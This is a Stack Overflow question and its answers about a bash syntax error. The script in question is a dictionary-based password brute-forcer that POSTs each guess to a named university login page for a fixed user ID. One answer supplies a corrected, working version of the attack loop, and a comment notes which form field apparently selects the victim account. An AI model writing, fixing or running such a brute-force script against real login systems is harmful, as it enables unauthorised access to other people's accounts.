# Syntax error: operand expected (error token is ""0"") on my code

Tags: bash

I have a question about bash script. This is my code but I have an error when running it. Please tell me what is problem and how I can fix it?

```
#!/bin/bash
clear
old_IFS=$IFS
IFS=$'\n'
lines={$(cat dic.txt)}
IFS=$old_IFS
linesNum=${#lines[@]}
i=0
while [ $i -lt $linesNum ]
do
    curl --silent --data '__VIEWSTATE=/wEPDwUKMjA2NTYzNTQ5MmRkM9W6oZR3v6vTlgum6RRE+XBA1YwwnX5efXI7H3VYGhb90nffjJgTX9BC2vcXTKn5JQP7gGZqRX5i6+UBKQJYpA==&__VIEWSTATEGENERATOR=6A475423&__EVENTVALIDATION=/wEdAAaQshnEBVjtUzZSOPhpyCK04ALG8S7ZiLlJqSsuXBsjGz/LlbfviBrHuco87ksZgLcCRt9NnSPADSFObzNVq3ShPZSQos3ErAwfDmhlNwH4qEsT6FfmV7ULQ7j/FGM5sO744qbWJoRwx8DdO7AyAGSCIHJNCxliL9wbeJx4BbqKpujh8LdA0lq2IWQA/fzdzgdrfpaMf8EyK24t6s+s9NNx&TxtMiddle=<r F51851="" F80351="935255415" F80401="${lines[\"$i\"]}" F83181="" F51701=""/>&Fm_Action=09&Frm_Type=&Frm_No=&TicketTextBox=' https://reg.pnu.ac.ir/forms/authenticateuser/main.htm | grep "کد1" >> /dev/null ; check=$?
    if [ $check -eq '0' ]
    then
        echo " Password not found!"
    else
        echo " Password is: ${lines[\"$i\"]}"
        break
    fi
    ((i++))
done
```

Comment: https://www.shellcheck.net/ The line `lines={$(cat dic.txt)}` is wrong. Both syntactically and pragmatically. Use `mapfile` or `readarray` or `wc -l`.

Comment: Well and did you check `${lines[\"$i\"]}` line 16 for errors?

Comment: Please don't make more work for other people by vandalizing your posts. By posting on Stack Overflow, you've granted a non-revocable right, under the [CC BY-SA 3.0 license](https://creativecommons.org/licenses/by-sa/3.0) for this site to distribute that content. As per the Terms of Service, any vandalism will be reverted. If you want to know more about deleting a post, please read more at [How does deleting work?](https://meta.stackexchange.com/q/5221)

Answer (score 1):

Bash arrays are declared as:

```
arr=(elem1 elem2 elem3)
```

And then elements are accessed like:

```
> echo "${arr[0]}"
elem1
```

If you want to use an index, you can do:

```
> i=1
> echo "${arr[$i]}"
elem2
```

The part between `[...]` is not re-evaulated - ie. quotes are not being removed, altough variable expansion happens.

So the following will not work:

```
> i=2
> echo "${arr["$i"]}"
bash: \"2\": syntax error: operand expected (error token is "\"2\"")
```

Because quotes are not removed from the bash array index and quotes are not allowed, it results in syntax error.

This should be enough to fix errors in your script. Both `${lines[\"$i\"]}` and `${lines['$i']}` are incorrect and syntax errors.

Answer (score 0):

Your code contains a number of antipatterns. To loop across lines in a file, just `read -r` one line at a time.  To check whether `command` is successful, use `if command` rather than `command; if [ $? -eq 0 ]`

```
#!/bin/bash
#clear  # just don't
fmt_data='__VIEWSTATE=/wEPDwUKMjA2NTYzNTQ5MmRkM9W6oZR3v6vTlgum6RRE+XBA1YwwnX5efXI7H3VYGhb90nffjJgTX9BC2vcXTKn5JQP7gGZqRX5i6+UBKQJYpA==&__VIEWSTATEGENERATOR=6A475423&__EVENTVALIDATION=/wEdAAaQshnEBVjtUzZSOPhpyCK04ALG8S7ZiLlJqSsuXBsjGz/LlbfviBrHuco87ksZgLcCRt9NnSPADSFObzNVq3ShPZSQos3ErAwfDmhlNwH4qEsT6FfmV7ULQ7j/FGM5sO744qbWJoRwx8DdO7AyAGSCIHJNCxliL9wbeJx4BbqKpujh8LdA0lq2IWQA/fzdzgdrfpaMf8EyK24t6s+s9NNx&TxtMiddle=<r F51851="" F80351="935255415" F80401="%s" F83181="" F51701=""/>&Fm_Action=09&Frm_Type=&Frm_No=&TicketTextBox='
url='https://reg.pnu.ac.ir/forms/authenticateuser/main.htm'

while read -r line; do
    if curl --silent --data "$(printf "$fmt_data" "$line")" "$url" |
        grep -q "کد1"
    then
        echo "$0: Password not found!" >&2
    else
        echo "$0: Password is: $line" >&2
        break
    fi
done <dic.txt
```

Comment: I see no obvious way to control which user's password this code is attempting to brute force.  Apparently the field `F80351` is what determines this? If you genuinely cannot figure out how to change it, (accept this answer, or post and accept of your own, and) ask a new question with the details clearly explained (probably with a link back to this question for context).